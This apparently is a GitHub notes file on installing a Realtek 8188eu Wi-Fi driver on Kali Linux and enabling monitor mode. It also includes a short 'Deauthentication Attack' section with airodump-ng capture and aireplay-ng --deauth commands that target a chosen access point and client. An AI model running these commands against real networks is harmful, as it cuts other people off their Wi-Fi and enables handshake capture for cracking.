-
Notifications
You must be signed in to change notification settings - Fork 0
/
wifi driver install
51 lines (27 loc) · 909 Bytes
/
wifi driver install
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
sudo rmmod r8188eu.ko
sudo -i
echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf"
exit
make
sudo make install
sudo modprobe 8188eu
To enable Monitor mode
ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig \\check mode: monitor
Deauthentication Attack[for educational purpose only]
airodump-ng wlan0
airodump-ng --bssid <id> --channel <ch> --write test wlan0
aireplay-ng --deauth [any no.] -a <bssid> -c <station id> wlan0
Important note:
If after restarting your kali machine doesn't recognise your device..
As lot of people are facing the same problem ..
I have a solution for you..
Whenever you restart your kali OS
Insert the adapter and run the command
sudo rmmod r8188eu.ko
sudo modprobe 8188eu
Disconnect the device and connect again..
Then check.